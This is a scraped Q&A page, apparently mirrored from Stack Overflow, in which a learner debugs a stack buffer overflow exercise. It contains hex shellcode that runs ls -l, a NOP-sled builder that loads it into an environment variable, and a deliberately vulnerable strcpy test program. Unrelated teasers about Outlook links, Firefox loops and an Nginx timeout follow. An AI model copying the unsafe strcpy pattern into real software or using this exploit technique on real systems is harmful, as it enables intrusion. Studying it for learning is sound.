Why argv[1] in Linux c program doesn't get correct values from environment variable? -


i'm trying learn basics of buffer overflow attacks. wrote simple shellcode execute ls -l , wrote program put shellcode among address changing (for bbaa address test this) environment variable. code:

#include <stdio.h> #include <stdlib.h> #include <string.h>  char execvelsshell[] =  "\xeb\x3d\x5e\x31\xc0\xb0\x7d\x89\xf3\xb9\xff\xff\xff\xff\xc1\xe1\x0c"                         "\x21\xcb\x31\xc9\xb1\x20\x31\xd2\xb2\x07\xcd\x80\x31\xc0\x88\x46\x07"                         "\x88\x46\x0a\x89\x76\x0b\x89\xf3\x83\xc3\x08\x89\x5e\x0f\x89\x46\x13"                         "\x89\xf3\x8d\x4e\x0b\x8d\x56\x13\xb0\x0b\xcd\x80\xe8\xbe\xff\xff\xff"                         "\x2f\x62\x69\x6e\x2f\x6c\x73\x30\x2d\x6c\x30\x31\x31\x31\x31\x32\x32"                         "\x32\x32\x33\x33\x33\x33\x33"; const int buffsize = 4+100+4+4+4+4;//var_name + buffer + int + ebp + ret_address + null  #define nop 0x90 char addr[] = "\x61\x61\x62\x62"; //bbaa test  int main(){     char buffer[buffsize];     int shellsize = strlen(execvelsshell);     printf("shelllen: %d\n", shellsize);      memset(buffer, nop, buffsize);     memcpy(buffer, "akj=", 4);     memcpy(buffer+4, execvelsshell, shellsize);     memcpy(buffer+buffsize-8, addr, 4);     memcpy(buffer+buffsize-4, "\x00\x00\x00\x00", 4);      printf("address: %s\n", buffer+buffsize-8);     printf("env len: %d\n", strlen(buffer));      putenv(buffer);     system("/bin/bash");     return 0; }

when print variable , test it's size both in code , in bash using echo -n $akj | wc correct size when send variable input exploit test subject prints size of argv[1] 22. test program:

#include <stdio.h> #include <string.h>  int main(int argc, char *argv[]){     char buffer[100];     int i=0xcceeaabb;     printf("len: %d\n", strlen(argv[1]));     strcpy(buffer, argv[1]);     return 0; }

the intresting part if send other variables such $path or random string argv[1] has correct value , size. when used gdb see argv[1] has want have in c code it's size not correct, ergo, doesn't work.

i've worked several hours on simple program , used think of giving different values , variables debugging code using gdb , tracing happens on stack , registers couldn't work. i'd appreciate if shed light on problem. i'm pretty sure i'm missing simple!!!

btw i'm working on ubuntu 14.4 gcc 4.8.2 , code wrote shellcode can found here.


Comments

Post a Comment

Popular posts from this blog

html - Outlook 2010 Anchor (url/address/link) -

i'm trying link specific pdf page msoutlook'10 or msword'10, #page=... anchor particularly useful , works fine elsewhere. unfortunately when click [ctr-k] in outlook or winword, links re-formatted assuming unc path. pdf file located on shared drive. using "file:" prefix links open pdf in adobe reader (outside of browser), , "http:" open inside browser. issue seem need open in browser "file:" prefix in order anchor work. know anchors work inside browser. outlook uses windows/explorer default program (based on file extension) seems open in adobe reader neglecting anchor. is aware of solution, link specific page or bookmark of shared-pdf ms outlook and/or winword link? common references: mailermailer.com/...anchor-tags-html-emails campaignmonitor.com/...anchor-links-in-email-newsletters/ stackoverflow.com/...anchor-in-pdf-document
Read more

javascript - Why does running this loop 9 times take 100x longer than running it 8 times? -

consider code: test = function() { } t = new test(); (var = 0; < 8; i++) { result = t instanceof test; } if change number of iterations 8 9 , loop take 100 times longer complete in latest version of firefox (41.0.1). tested on 2 different pcs , magic limit 8. here jsperf test used: http://jsperf.com/instanceof-8-times-vs-9-times does have idea why might happen? seems specific instanceof . not happen if else object, example check property. note: filed bugzilla bug this. jan de mooij mozilla team has posted details in bugzilla thread . here's simplistic interpretation of highly technical answers: in i < 8 case, firefox smart enough hoist result = t instanceof test; statement out of loop (according tests, doesn't seem omit altogether). in i < 9 case, apparently doesn't optimization . why? reason not clear, related fact 9 iterations threshold above function considered "hot" enough run through jit compiler. i < 8 cas...
Read more

Getting gateway time-out Rails app with Nginx + Puma running on Digital Ocean -

following this guide setup app on digital ocean droplet, not working. site not loading , it's throwing: "gateway time-out". the puma server works, since ps aux | grep puma prints: root 15878 0.0 0.4 376832 2168 ? sl 12:50 0:00 puma 2.13.4 (unix:///var/www/myapp/shared/tmp/sockets/myapp-puma.sock) [20150930164940] root 15881 0.0 0.7 903676 3692 ? sl 12:50 0:06 puma: cluster worker 0: 15878 [20150930164940] root 24654 0.0 0.1 11748 916 pts/2 s+ 18:00 0:00 grep --color=auto puma my nginx config: user root; worker_processes 1; events { worker_connections 1024; } http { upstream puma { server unix:///var/www/myapp/shared/tmp/sockets/myapp-puma.sock; } server { listen 80; server_name myapp.com; root /var/www/myapp/current/public; access_log /var/www/myapp/current/log/access.log; error_log /...
Read more